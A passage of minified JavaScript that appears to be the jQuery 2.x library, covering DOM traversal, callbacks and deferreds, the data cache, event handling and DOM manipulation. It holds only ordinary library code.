this;if("string"==typeof a){if(c="<"===a[0]&&">"===a[a.length-1]&&a.length>=3?[null,a,null]:z.exec(a),!c||!c[1]&&b)return!b||b.jquery?(b||y).find(a):this.constructor(b).find(a);if(c[1]){if(b=b instanceof n?b[0]:b,n.merge(this,n.parseHTML(c[1],b&&b.nodeType?b.ownerDocument||b:l,!0)),v.test(c[1])&&n.isPlainObject(b))for(c in b)n.isFunction(this[c])?this[c](b[c]):this.attr(c,b[c]);return this}return d=l.getElementById(c[2]),d&&d.parentNode&&(this.length=1,this[0]=d),this.context=l,this.selector=a,this}return a.nodeType?(this.context=this[0]=a,this.length=1,this):n.isFunction(a)?"undefined"!=typeof y.ready?y.ready(a):a(n):(void 0!==a.selector&&(this.selector=a.selector,this.context=a.context),n.makeArray(a,this))};A.prototype=n.fn,y=n(l);var B=/^(?:parents|prev(?:Until|All))/,C={children:!0,contents:!0,next:!0,prev:!0};n.extend({dir:function(a,b,c){var d=[],e=void 0!==c;while((a=a[b])&&9!==a.nodeType)if(1===a.nodeType){if(e&&n(a).is(c))break;d.push(a)}return d},sibling:function(a,b){for(var c=[];a;a=a.nextSibling)1===a.nodeType&&a!==b&&c.push(a);return c}}),n.fn.extend({has:function(a){var b=n(a,this),c=b.length;return this.filter(function(){for(var a=0;c>a;a++)if(n.contains(this,b[a]))return!0})},closest:function(a,b){for(var c,d=0,e=this.length,f=[],g=u.test(a)||"string"!=typeof a?n(a,b||this.context):0;e>d;d++)for(c=this[d];c&&c!==b;c=c.parentNode)if(c.nodeType<11&&(g?g.index(c)>-1:1===c.nodeType&&n.find.matchesSelector(c,a))){f.push(c);break}return this.pushStack(f.length>1?n.unique(f):f)},index:function(a){return a?"string"==typeof a?g.call(n(a),this[0]):g.call(this,a.jquery?a[0]:a):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(a,b){return this.pushStack(n.unique(n.merge(this.get(),n(a,b))))},addBack:function(a){return this.add(null==a?this.prevObject:this.prevObject.filter(a))}});function D(a,b){while((a=a[b])&&1!==a.nodeType);return a}n.each({parent:function(a){var b=a.parentNode;return b&&11!==b.nodeType?b:null},parents:function(a){return n.dir(a,"parentNode")},parentsUntil:function(a,b,c){return n.dir(a,"parentNode",c)},next:function(a){return D(a,"nextSibling")},prev:function(a){return D(a,"previousSibling")},nextAll:function(a){return n.dir(a,"nextSibling")},prevAll:function(a){return n.dir(a,"previousSibling")},nextUntil:function(a,b,c){return n.dir(a,"nextSibling",c)},prevUntil:function(a,b,c){return n.dir(a,"previousSibling",c)},siblings:function(a){return n.sibling((a.parentNode||{}).firstChild,a)},children:function(a){return n.sibling(a.firstChild)},contents:function(a){return a.contentDocument||n.merge([],a.childNodes)}},function(a,b){n.fn[a]=function(c,d){var e=n.map(this,b,c);return"Until"!==a.slice(-5)&&(d=c),d&&"string"==typeof d&&(e=n.filter(d,e)),this.length>1&&(C[a]||n.unique(e),B.test(a)&&e.reverse()),this.pushStack(e)}});var E=/\S+/g,F={};function G(a){var b=F[a]={};return n.each(a.match(E)||[],function(a,c){b[c]=!0}),b}n.Callbacks=function(a){a="string"==typeof a?F[a]||G(a):n.extend({},a);var b,c,d,e,f,g,h=[],i=!a.once&&[],j=function(l){for(b=a.memory&&l,c=!0,g=e||0,e=0,f=h.length,d=!0;h&&f>g;g++)if(h[g].apply(l[0],l[1])===!1&&a.stopOnFalse){b=!1;break}d=!1,h&&(i?i.length&&j(i.shift()):b?h=[]:k.disable())},k={add:function(){if(h){var c=h.length;!function g(b){n.each(b,function(b,c){var d=n.type(c);"function"===d?a.unique&&k.has(c)||h.push(c):c&&c.length&&"string"!==d&&g(c)})}(arguments),d?f=h.length:b&&(e=c,j(b))}return this},remove:function(){return h&&n.each(arguments,function(a,b){var c;while((c=n.inArray(b,h,c))>-1)h.splice(c,1),d&&(f>=c&&f--,g>=c&&g--)}),this},has:function(a){return a?n.inArray(a,h)>-1:!(!h||!h.length)},empty:function(){return h=[],f=0,this},disable:function(){return h=i=b=void 0,this},disabled:function(){return!h},lock:function(){return i=void 0,b||k.disable(),this},locked:function(){return!i},fireWith:function(a,b){return!h||c&&!i||(b=b||[],b=[a,b.slice?b.slice():b],d?i.push(b):j(b)),this},fire:function(){return k.fireWith(this,arguments),this},fired:function(){return!!c}};return k},n.extend({Deferred:function(a){var b=[["resolve","done",n.Callbacks("once memory"),"resolved"],["reject","fail",n.Callbacks("once memory"),"rejected"],["notify","progress",n.Callbacks("memory")]],c="pending",d={state:function(){return c},always:function(){return e.done(arguments).fail(arguments),this},then:function(){var a=arguments;return n.Deferred(function(c){n.each(b,function(b,f){var g=n.isFunction(a[b])&&a[b];e[f[1]](function(){var a=g&&g.apply(this,arguments);a&&n.isFunction(a.promise)?a.promise().done(c.resolve).fail(c.reject).progress(c.notify):c[f[0]+"With"](this===d?c.promise():this,g?[a]:arguments)})}),a=null}).promise()},promise:function(a){return null!=a?n.extend(a,d):d}},e={};return d.pipe=d.then,n.each(b,function(a,f){var g=f[2],h=f[3];d[f[1]]=g.add,h&&g.add(function(){c=h},b[1^a][2].disable,b[2][2].lock),e[f[0]]=function(){return e[f[0]+"With"](this===e?d:this,arguments),this},e[f[0]+"With"]=g.fireWith}),d.promise(e),a&&a.call(e,e),e},when:function(a){var b=0,c=d.call(arguments),e=c.length,f=1!==e||a&&n.isFunction(a.promise)?e:0,g=1===f?a:n.Deferred(),h=function(a,b,c){return function(e){b[a]=this,c[a]=arguments.length>1?d.call(arguments):e,c===i?g.notifyWith(b,c):--f||g.resolveWith(b,c)}},i,j,k;if(e>1)for(i=new Array(e),j=new Array(e),k=new Array(e);e>b;b++)c[b]&&n.isFunction(c[b].promise)?c[b].promise().done(h(b,k,c)).fail(g.reject).progress(h(b,j,i)):--f;return f||g.resolveWith(k,c),g.promise()}});var H;n.fn.ready=function(a){return n.ready.promise().done(a),this},n.extend({isReady:!1,readyWait:1,holdReady:function(a){a?n.readyWait++:n.ready(!0)},ready:function(a){(a===!0?--n.readyWait:n.isReady)||(n.isReady=!0,a!==!0&&--n.readyWait>0||(H.resolveWith(l,[n]),n.fn.triggerHandler&&(n(l).triggerHandler("ready"),n(l).off("ready"))))}});function I(){l.removeEventListener("DOMContentLoaded",I,!1),a.removeEventListener("load",I,!1),n.ready()}n.ready.promise=function(b){return H||(H=n.Deferred(),"complete"===l.readyState?setTimeout(n.ready):(l.addEventListener("DOMContentLoaded",I,!1),a.addEventListener("load",I,!1))),H.promise(b)},n.ready.promise();var J=n.access=function(a,b,c,d,e,f,g){var h=0,i=a.length,j=null==c;if("object"===n.type(c)){e=!0;for(h in c)n.access(a,b,h,c[h],!0,f,g)}else if(void 0!==d&&(e=!0,n.isFunction(d)||(g=!0),j&&(g?(b.call(a,d),b=null):(j=b,b=function(a,b,c){return j.call(n(a),c)})),b))for(;i>h;h++)b(a[h],c,g?d:d.call(a[h],h,b(a[h],c)));return e?a:j?b.call(a):i?b(a[0],c):f};n.acceptData=function(a){return 1===a.nodeType||9===a.nodeType||!+a.nodeType};function K(){Object.defineProperty(this.cache={},0,{get:function(){return{}}}),this.expando=n.expando+Math.random()}K.uid=1,K.accepts=n.acceptData,K.prototype={key:function(a){if(!K.accepts(a))return 0;var b={},c=a[this.expando];if(!c){c=K.uid++;try{b[this.expando]={value:c},Object.defineProperties(a,b)}catch(d){b[this.expando]=c,n.extend(a,b)}}return this.cache[c]||(this.cache[c]={}),c},set:function(a,b,c){var d,e=this.key(a),f=this.cache[e];if("string"==typeof b)f[b]=c;else if(n.isEmptyObject(f))n.extend(this.cache[e],b);else for(d in b)f[d]=b[d];return f},get:function(a,b){var c=this.cache[this.key(a)];return void 0===b?c:c[b]},access:function(a,b,c){var d;return void 0===b||b&&"string"==typeof b&&void 0===c?(d=this.get(a,b),void 0!==d?d:this.get(a,n.camelCase(b))):(this.set(a,b,c),void 0!==c?c:b)},remove:function(a,b){var c,d,e,f=this.key(a),g=this.cache[f];if(void 0===b)this.cache[f]={};else{n.isArray(b)?d=b.concat(b.map(n.camelCase)):(e=n.camelCase(b),b in g?d=[b,e]:(d=e,d=d in g?[d]:d.match(E)||[])),c=d.length;while(c--)delete g[d[c]]}},hasData:function(a){return!n.isEmptyObject(this.cache[a[this.expando]]||{})},discard:function(a){a[this.expando]&&delete this.cache[a[this.expando]]}};var L=new K,M=new K,N=/^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,O=/([A-Z])/g;function P(a,b,c){var d;if(void 0===c&&1===a.nodeType)if(d="data-"+b.replace(O,"-$1").toLowerCase(),c=a.getAttribute(d),"string"==typeof c){try{c="true"===c?!0:"false"===c?!1:"null"===c?null:+c+""===c?+c:N.test(c)?n.parseJSON(c):c}catch(e){}M.set(a,b,c)}else c=void 0;return c}n.extend({hasData:function(a){return M.hasData(a)||L.hasData(a)},data:function(a,b,c){return M.access(a,b,c)},removeData:function(a,b){M.remove(a,b)
     3 +},_data:function(a,b,c){return L.access(a,b,c)},_removeData:function(a,b){L.remove(a,b)}}),n.fn.extend({data:function(a,b){var c,d,e,f=this[0],g=f&&f.attributes;if(void 0===a){if(this.length&&(e=M.get(f),1===f.nodeType&&!L.get(f,"hasDataAttrs"))){c=g.length;while(c--)g[c]&&(d=g[c].name,0===d.indexOf("data-")&&(d=n.camelCase(d.slice(5)),P(f,d,e[d])));L.set(f,"hasDataAttrs",!0)}return e}return"object"==typeof a?this.each(function(){M.set(this,a)}):J(this,function(b){var c,d=n.camelCase(a);if(f&&void 0===b){if(c=M.get(f,a),void 0!==c)return c;if(c=M.get(f,d),void 0!==c)return c;if(c=P(f,d,void 0),void 0!==c)return c}else this.each(function(){var c=M.get(this,d);M.set(this,d,b),-1!==a.indexOf("-")&&void 0!==c&&M.set(this,a,b)})},null,b,arguments.length>1,null,!0)},removeData:function(a){return this.each(function(){M.remove(this,a)})}}),n.extend({queue:function(a,b,c){var d;return a?(b=(b||"fx")+"queue",d=L.get(a,b),c&&(!d||n.isArray(c)?d=L.access(a,b,n.makeArray(c)):d.push(c)),d||[]):void 0},dequeue:function(a,b){b=b||"fx";var c=n.queue(a,b),d=c.length,e=c.shift(),f=n._queueHooks(a,b),g=function(){n.dequeue(a,b)};"inprogress"===e&&(e=c.shift(),d--),e&&("fx"===b&&c.unshift("inprogress"),delete f.stop,e.call(a,g,f)),!d&&f&&f.empty.fire()},_queueHooks:function(a,b){var c=b+"queueHooks";return L.get(a,c)||L.access(a,c,{empty:n.Callbacks("once memory").add(function(){L.remove(a,[b+"queue",c])})})}}),n.fn.extend({queue:function(a,b){var c=2;return"string"!=typeof a&&(b=a,a="fx",c--),arguments.length<c?n.queue(this[0],a):void 0===b?this:this.each(function(){var c=n.queue(this,a,b);n._queueHooks(this,a),"fx"===a&&"inprogress"!==c[0]&&n.dequeue(this,a)})},dequeue:function(a){return this.each(function(){n.dequeue(this,a)})},clearQueue:function(a){return this.queue(a||"fx",[])},promise:function(a,b){var c,d=1,e=n.Deferred(),f=this,g=this.length,h=function(){--d||e.resolveWith(f,[f])};"string"!=typeof a&&(b=a,a=void 0),a=a||"fx";while(g--)c=L.get(f[g],a+"queueHooks"),c&&c.empty&&(d++,c.empty.add(h));return h(),e.promise(b)}});var Q=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,R=["Top","Right","Bottom","Left"],S=function(a,b){return a=b||a,"none"===n.css(a,"display")||!n.contains(a.ownerDocument,a)},T=/^(?:checkbox|radio)$/i;!function(){var a=l.createDocumentFragment(),b=a.appendChild(l.createElement("div")),c=l.createElement("input");c.setAttribute("type","radio"),c.setAttribute("checked","checked"),c.setAttribute("name","t"),b.appendChild(c),k.checkClone=b.cloneNode(!0).cloneNode(!0).lastChild.checked,b.innerHTML="<textarea>x</textarea>",k.noCloneChecked=!!b.cloneNode(!0).lastChild.defaultValue}();var U="undefined";k.focusinBubbles="onfocusin"in a;var V=/^key/,W=/^(?:mouse|pointer|contextmenu)|click/,X=/^(?:focusinfocus|focusoutblur)$/,Y=/^([^.]*)(?:\.(.+)|)$/;function Z(){return!0}function $(){return!1}function _(){try{return l.activeElement}catch(a){}}n.event={global:{},add:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,o,p,q,r=L.get(a);if(r){c.handler&&(f=c,c=f.handler,e=f.selector),c.guid||(c.guid=n.guid++),(i=r.events)||(i=r.events={}),(g=r.handle)||(g=r.handle=function(b){return typeof n!==U&&n.event.triggered!==b.type?n.event.dispatch.apply(a,arguments):void 0}),b=(b||"").match(E)||[""],j=b.length;while(j--)h=Y.exec(b[j])||[],o=q=h[1],p=(h[2]||"").split(".").sort(),o&&(l=n.event.special[o]||{},o=(e?l.delegateType:l.bindType)||o,l=n.event.special[o]||{},k=n.extend({type:o,origType:q,data:d,handler:c,guid:c.guid,selector:e,needsContext:e&&n.expr.match.needsContext.test(e),namespace:p.join(".")},f),(m=i[o])||(m=i[o]=[],m.delegateCount=0,l.setup&&l.setup.call(a,d,p,g)!==!1||a.addEventListener&&a.addEventListener(o,g,!1)),l.add&&(l.add.call(a,k),k.handler.guid||(k.handler.guid=c.guid)),e?m.splice(m.delegateCount++,0,k):m.push(k),n.event.global[o]=!0)}},remove:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,o,p,q,r=L.hasData(a)&&L.get(a);if(r&&(i=r.events)){b=(b||"").match(E)||[""],j=b.length;while(j--)if(h=Y.exec(b[j])||[],o=q=h[1],p=(h[2]||"").split(".").sort(),o){l=n.event.special[o]||{},o=(d?l.delegateType:l.bindType)||o,m=i[o]||[],h=h[2]&&new RegExp("(^|\\.)"+p.join("\\.(?:.*\\.|)")+"(\\.|$)"),g=f=m.length;while(f--)k=m[f],!e&&q!==k.origType||c&&c.guid!==k.guid||h&&!h.test(k.namespace)||d&&d!==k.selector&&("**"!==d||!k.selector)||(m.splice(f,1),k.selector&&m.delegateCount--,l.remove&&l.remove.call(a,k));g&&!m.length&&(l.teardown&&l.teardown.call(a,p,r.handle)!==!1||n.removeEvent(a,o,r.handle),delete i[o])}else for(o in i)n.event.remove(a,o+b[j],c,d,!0);n.isEmptyObject(i)&&(delete r.handle,L.remove(a,"events"))}},trigger:function(b,c,d,e){var f,g,h,i,k,m,o,p=[d||l],q=j.call(b,"type")?b.type:b,r=j.call(b,"namespace")?b.namespace.split("."):[];if(g=h=d=d||l,3!==d.nodeType&&8!==d.nodeType&&!X.test(q+n.event.triggered)&&(q.indexOf(".")>=0&&(r=q.split("."),q=r.shift(),r.sort()),k=q.indexOf(":")<0&&"on"+q,b=b[n.expando]?b:new n.Event(q,"object"==typeof b&&b),b.isTrigger=e?2:3,b.namespace=r.join("."),b.namespace_re=b.namespace?new RegExp("(^|\\.)"+r.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,b.result=void 0,b.target||(b.target=d),c=null==c?[b]:n.makeArray(c,[b]),o=n.event.special[q]||{},e||!o.trigger||o.trigger.apply(d,c)!==!1)){if(!e&&!o.noBubble&&!n.isWindow(d)){for(i=o.delegateType||q,X.test(i+q)||(g=g.parentNode);g;g=g.parentNode)p.push(g),h=g;h===(d.ownerDocument||l)&&p.push(h.defaultView||h.parentWindow||a)}f=0;while((g=p[f++])&&!b.isPropagationStopped())b.type=f>1?i:o.bindType||q,m=(L.get(g,"events")||{})[b.type]&&L.get(g,"handle"),m&&m.apply(g,c),m=k&&g[k],m&&m.apply&&n.acceptData(g)&&(b.result=m.apply(g,c),b.result===!1&&b.preventDefault());return b.type=q,e||b.isDefaultPrevented()||o._default&&o._default.apply(p.pop(),c)!==!1||!n.acceptData(d)||k&&n.isFunction(d[q])&&!n.isWindow(d)&&(h=d[k],h&&(d[k]=null),n.event.triggered=q,d[q](),n.event.triggered=void 0,h&&(d[k]=h)),b.result}},dispatch:function(a){a=n.event.fix(a);var b,c,e,f,g,h=[],i=d.call(arguments),j=(L.get(this,"events")||{})[a.type]||[],k=n.event.special[a.type]||{};if(i[0]=a,a.delegateTarget=this,!k.preDispatch||k.preDispatch.call(this,a)!==!1){h=n.event.handlers.call(this,a,j),b=0;while((f=h[b++])&&!a.isPropagationStopped()){a.currentTarget=f.elem,c=0;while((g=f.handlers[c++])&&!a.isImmediatePropagationStopped())(!a.namespace_re||a.namespace_re.test(g.namespace))&&(a.handleObj=g,a.data=g.data,e=((n.event.special[g.origType]||{}).handle||g.handler).apply(f.elem,i),void 0!==e&&(a.result=e)===!1&&(a.preventDefault(),a.stopPropagation()))}return k.postDispatch&&k.postDispatch.call(this,a),a.result}},handlers:function(a,b){var c,d,e,f,g=[],h=b.delegateCount,i=a.target;if(h&&i.nodeType&&(!a.button||"click"!==a.type))for(;i!==this;i=i.parentNode||this)if(i.disabled!==!0||"click"!==a.type){for(d=[],c=0;h>c;c++)f=b[c],e=f.selector+" ",void 0===d[e]&&(d[e]=f.needsContext?n(e,this).index(i)>=0:n.find(e,this,null,[i]).length),d[e]&&d.push(f);d.length&&g.push({elem:i,handlers:d})}return h<b.length&&g.push({elem:this,handlers:b.slice(h)}),g},props:"altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(a,b){return null==a.which&&(a.which=null!=b.charCode?b.charCode:b.keyCode),a}},mouseHooks:{props:"button buttons clientX clientY offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(a,b){var c,d,e,f=b.button;return null==a.pageX&&null!=b.clientX&&(c=a.target.ownerDocument||l,d=c.documentElement,e=c.body,a.pageX=b.clientX+(d&&d.scrollLeft||e&&e.scrollLeft||0)-(d&&d.clientLeft||e&&e.clientLeft||0),a.pageY=b.clientY+(d&&d.scrollTop||e&&e.scrollTop||0)-(d&&d.clientTop||e&&e.clientTop||0)),a.which||void 0===f||(a.which=1&f?1:2&f?3:4&f?2:0),a}},fix:function(a){if(a[n.expando])return a;var b,c,d,e=a.type,f=a,g=this.fixHooks[e];g||(this.fixHooks[e]=g=W.test(e)?this.mouseHooks:V.test(e)?this.keyHooks:{}),d=g.props?this.props.concat(g.props):this.props,a=new n.Event(f),b=d.length;while(b--)c=d[b],a[c]=f[c];return a.target||(a.target=l),3===a.target.nodeType&&(a.target=a.target.parentNode),g.filter?g.filter(a,f):a},special:{load:{noBubble:!0},focus:{trigger:function(){return this!==_()&&this.focus?(this.focus(),!1):void 0},delegateType:"focusin"},blur:{trigger:function(){return this===_()&&this.blur?(this.blur(),!1):void 0},delegateType:"focusout"},click:{trigger:function(){return"checkbox"===this.type&&this.click&&n.nodeName(this,"input")?(this.click(),!1):void 0},_default:function(a){return n.nodeName(a.target,"a")}},beforeunload:{postDispatch:function(a){void 0!==a.result&&a.originalEvent&&(a.originalEvent.returnValue=a.result)}}},simulate:function(a,b,c,d){var e=n.extend(new n.Event,c,{type:a,isSimulated:!0,originalEvent:{}});d?n.event.trigger(e,null,b):n.event.dispatch.call(b,e),e.isDefaultPrevented()&&c.preventDefault()}},n.removeEvent=function(a,b,c){a.removeEventListener&&a.removeEventListener(b,c,!1)},n.Event=function(a,b){return this instanceof n.Event?(a&&a.type?(this.originalEvent=a,this.type=a.type,this.isDefaultPrevented=a.defaultPrevented||void 0===a.defaultPrevented&&a.returnValue===!1?Z:$):this.type=a,b&&n.extend(this,b),this.timeStamp=a&&a.timeStamp||n.now(),void(this[n.expando]=!0)):new n.Event(a,b)},n.Event.prototype={isDefaultPrevented:$,isPropagationStopped:$,isImmediatePropagationStopped:$,preventDefault:function(){var a=this.originalEvent;this.isDefaultPrevented=Z,a&&a.preventDefault&&a.preventDefault()},stopPropagation:function(){var a=this.originalEvent;this.isPropagationStopped=Z,a&&a.stopPropagation&&a.stopPropagation()},stopImmediatePropagation:function(){var a=this.originalEvent;this.isImmediatePropagationStopped=Z,a&&a.stopImmediatePropagation&&a.stopImmediatePropagation(),this.stopPropagation()}},n.each({mouseenter:"mouseover",mouseleave:"mouseout",pointerenter:"pointerover",pointerleave:"pointerout"},function(a,b){n.event.special[a]={delegateType:b,bindType:b,handle:function(a){var c,d=this,e=a.relatedTarget,f=a.handleObj;return(!e||e!==d&&!n.contains(d,e))&&(a.type=f.origType,c=f.handler.apply(this,arguments),a.type=b),c}}}),k.focusinBubbles||n.each({focus:"focusin",blur:"focusout"},function(a,b){var c=function(a){n.event.simulate(b,a.target,n.event.fix(a),!0)};n.event.special[b]={setup:function(){var d=this.ownerDocument||this,e=L.access(d,b);e||d.addEventListener(a,c,!0),L.access(d,b,(e||0)+1)},teardown:function(){var d=this.ownerDocument||this,e=L.access(d,b)-1;e?L.access(d,b,e):(d.removeEventListener(a,c,!0),L.remove(d,b))}}}),n.fn.extend({on:function(a,b,c,d,e){var f,g;if("object"==typeof a){"string"!=typeof b&&(c=c||b,b=void 0);for(g in a)this.on(g,b,c,a[g],e);return this}if(null==c&&null==d?(d=b,c=b=void 0):null==d&&("string"==typeof b?(d=c,c=void 0):(d=c,c=b,b=void 0)),d===!1)d=$;else if(!d)return this;return 1===e&&(f=d,d=function(a){return n().off(a),f.apply(this,arguments)},d.guid=f.guid||(f.guid=n.guid++)),this.each(function(){n.event.add(this,a,d,c,b)})},one:function(a,b,c,d){return this.on(a,b,c,d,1)},off:function(a,b,c){var d,e;if(a&&a.preventDefault&&a.handleObj)return d=a.handleObj,n(a.delegateTarget).off(d.namespace?d.origType+"."+d.namespace:d.origType,d.selector,d.handler),this;if("object"==typeof a){for(e in a)this.off(e,b,a[e]);return this}return(b===!1||"function"==typeof b)&&(c=b,b=void 0),c===!1&&(c=$),this.each(function(){n.event.remove(this,a,c,b)})},trigger:function(a,b){return this.each(function(){n.event.trigger(a,b,this)})},triggerHandler:function(a,b){var c=this[0];return c?n.event.trigger(a,b,c,!0):void 0}});var ab=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,bb=/<([\w:]+)/,cb=/<|&#?\w+;/,db=/<(?:script|style|link)/i,eb=/checked\s*(?:[^=]|=\s*.checked.)/i,fb=/^$|\/(?:java|ecma)script/i,gb=/^true\/(.*)/,hb=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g,ib={option:[1,"<select multiple='multiple'>","</select>"],thead:[1,"<table>","</table>"],col:[2,"<table><colgroup>","</colgroup></table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:[0,"",""]};ib.optgroup=ib.option,ib.tbody=ib.tfoot=ib.colgroup=ib.caption=ib.thead,ib.th=ib.td;function jb(a,b){return n.nodeName(a,"table")&&n.nodeName(11!==b.nodeType?b:b.firstChild,"tr")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.ownerDocument.createElement("tbody")):a}function kb(a){return a.type=(null!==a.getAttribute("type"))+"/"+a.type,a}function lb(a){var b=gb.exec(a.type);return b?a.type=b[1]:a.removeAttribute("type"),a}function mb(a,b){for(var c=0,d=a.length;d>c;c++)L.set(a[c],"globalEval",!b||L.get(b[c],"globalEval"))}function nb(a,b){var c,d,e,f,g,h,i,j;if(1===b.nodeType){if(L.hasData(a)&&(f=L.access(a),g=L.set(b,f),j=f.events)){delete g.handle,g.events={};for(e in j)for(c=0,d=j[e].length;d>c;c++)n.event.add(b,e,j[e][c])}M.hasData(a)&&(h=M.access(a),i=n.extend({},h),M.set(b,i))}}function ob(a,b){var c=a.getElementsByTagName?a.getElementsByTagName(b||"*"):a.querySelectorAll?a.querySelectorAll(b||"*"):[];return void 0===b||b&&n.nodeName(a,b)?n.merge([a],c):c}function pb(a,b){var c=b.nodeName.toLowerCase();"input"===c&&T.test(a.type)?b.checked=a.checked:("input"===c||"textarea"===c)&&(b.defaultValue=a.defaultValue)}n.extend({clone:function(a,b,c){var d,e,f,g,h=a.cloneNode(!0),i=n.contains(a.ownerDocument,a);if(!(k.noCloneChecked||1!==a.nodeType&&11!==a.nodeType||n.isXMLDoc(a)))for(g=ob(h),f=ob(a),d=0,e=f.length;e>d;d++)pb(f[d],g[d]);if(b)if(c)for(f=f||ob(a),g=g||ob(h),d=0,e=f.length;e>d;d++)nb(f[d],g[d]);else nb(a,h);return g=ob(h,"script"),g.length>0&&mb(g,!i&&ob(a,"script")),h},buildFragment:function(a,b,c,d){for(var e,f,g,h,i,j,k=b.createDocumentFragment(),l=[],m=0,o=a.length;o>m;m++)if(e=a[m],e||0===e)if("object"===n.type(e))n.merge(l,e.nodeType?[e]:e);else if(cb.test(e)){f=f||k.appendChild(b.createElement("div")),g=(bb.exec(e)||["",""])[1].toLowerCase(),h=ib[g]||ib._default,f.innerHTML=h[1]+e.replace(ab,"<$1></$2>")+h[2],j=h[0];while(j--)f=f.lastChild;n.merge(l,f.childNodes),f=k.firstChild,f.textContent=""}else l.push(b.createTextNode(e));k.textContent="",m=0;while(e=l[m++])if((!d||-1===n.inArray(e,d))&&(i=n.contains(e.ownerDocument,e),f=ob(k.appendChild(e),"script"),i&&mb(f),c)){j=0;while(e=f[j++])fb.test(e.type||"")&&c.push(e)}return k},cleanData:function(a){for(var b,c,d,e,f=n.event.special,g=0;void 0!==(c=a[g]);g++){if(n.acceptData(c)&&(e=c[L.expando],e&&(b=L.cache[e]))){if(b.events)for(d in b.events)f[d]?n.event.remove(c,d):n.removeEvent(c,d,b.handle);L.cache[e]&&delete L.cache[e]}delete M.cache[c[M.expando]]}}}),n.fn.extend({text:function(a){return J(this,function(a){return void 0===a?n.text(this):this.empty().each(function(){(1===this.nodeType||11===this.nodeType||9===this.nodeType)&&(this.textContent=a)})},null,a,arguments.length)},append:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=jb(this,a);b.appendChild(a)}})},prepend:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=jb(this,a);b.insertBefore(a,b.firstChild)}})},before:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this)})},after:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this.nextSibling)})},remove:function(a,b){for(var c,d=a?n.filter(a,this):this,e=0;null!=(c=d[e]);e++)b||1!==c.nodeType||n.cleanData(ob(c)),c.parentNode&&(b&&n.contains(c.ownerDocument,c)&&mb(ob(c,"script")),c.parentNode.removeChild(c));return this},empty:function(){for(var a,b=0;null!=(a=this[b]);b++)1===a.nodeType&&(n.cleanData(ob(a,!1)),a.textContent="");return this},clone:function(a,b){return a=null==a?!1:a,b=null==b?a:b,this.map(function(){return n.clone(this,a,b)})},html:function(a){return J(this,function(a){var b=this[0]||{},c=0,d=this.length;if(void 0===a&&1===b.nodeType)return b.innerHTML;if("string"==typeof a&&!db.test(a)&&!ib[(bb.exec(a)||["",""])[1].toLowerCase()]){a=a.replace(ab,"<$1></$2>");try{for(;d>c;c++)b=this[c]||{},1===b.nodeType&&(n.cleanData(ob(b,!1)),b.innerHTML=a);b=0}catch(e){}}b&&this.empty().append(a)},null,a,arguments.length)},replaceWith:function(){var a=arguments[0];return this.domManip(arguments,function(b){a=this.parentNode,n.cleanData(ob(this)),a&&a.replaceChild(b,this)}),a&&(a.length||a.nodeType)?this:this.remove()},detach:function(a){return this.remove(a,!0)},domManip:function(a,b){a=e.apply([],a);var c,d,f,g,h,i,j=0,l=this.length,m=this,o=l-1,p=a[0],q=n.isFunction(p);if(q||l>1&&"string"==typeof p&&!k.checkClone&&eb.test(p))return this.each(function(c){var d=m.eq(c);q&&(a[0]=p.call(this,c,d.html())),d.domManip(a,b)});if(l&&(c=n.buildFragment(a,this[0].ownerDocument,!1,this),d=c.firstChild,1===c.childNodes.length&&(c=d),d)){for(f=n.map(ob(c,"script"),kb),g=f.length;l>j;j++)h=c,j!==o&&(h=n.clone(h,!0,!0),g&&n.merge(f,ob(h,"script"))),b.call(this[j],h,j);if(g)for(i=f[f.length-1].ownerDocument,n.map(f,lb),j=0;g>j;j++)h=f[j],fb.test(h.type||"")&&!L.access(h,"globalEval")&&n.contains(i,h)&&(h.src?n._evalUrl&&n._evalUrl(h.src):n.globalEval(h.textContent.replace(hb,"")))}return this}}),n.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){n.fn[a]=function(a){for(var c,d=[],e=n(a),g=e.length-1,h=0;g>=h;h++)c=h===g?this:this.clone(!0),n(e[h])[b](c),f.apply(d,c.get());return this.pushStack(d)}});var qb,rb={};function sb(b,c){var d,e=n(c.createElement(b)).appendTo(c.body),f=a.getDefaultComputedStyle&&(d=a.getDefaultComputedStyle(e[0]))?d.display:n.css(e[0],"display");return e.detach(),f}function tb(a){var b=l,c=rb[a];return c||(c=sb(a,b),"none"!==c&&c||(qb=(qb||n("<iframe frameborder='0' width='0' height='0'/>")).appendTo(b.documentElement),b=qb[0].contentDocument,b.write(),b.close(),c=sb(a,b),qb.detach()),rb[a]=c),c}var ub=/^margin/,vb=new RegExp("^("+Q+")(?!px)[a-z%]+$","i"),wb=function(a){return a.ownerDocument.defaultView.getComputedStyle(a,null)};function xb(a,b,c){var d,e,f,g,h=a.style;return c=c||wb(a),c&&(g=c.getPropertyValue(b)||c[b]),c&&(""!==g||n.contains(a.ownerDocument,a)||(g=n.style(a,b)),vb.test(g)&&ub.test(b)&&(d=h.width,e=h.minWidth,f=h.maxWidth,h.minWidth=h.maxWidth=h.width=g,g=c.width,h.width=d,h.minWidth=e,h.maxWidth=f)),void 0!==g?g+"":g}function yb(a,b){return{get:function(){return a()?void delete this.get:(this.get=b).apply(this,arguments)}}}!function(){var 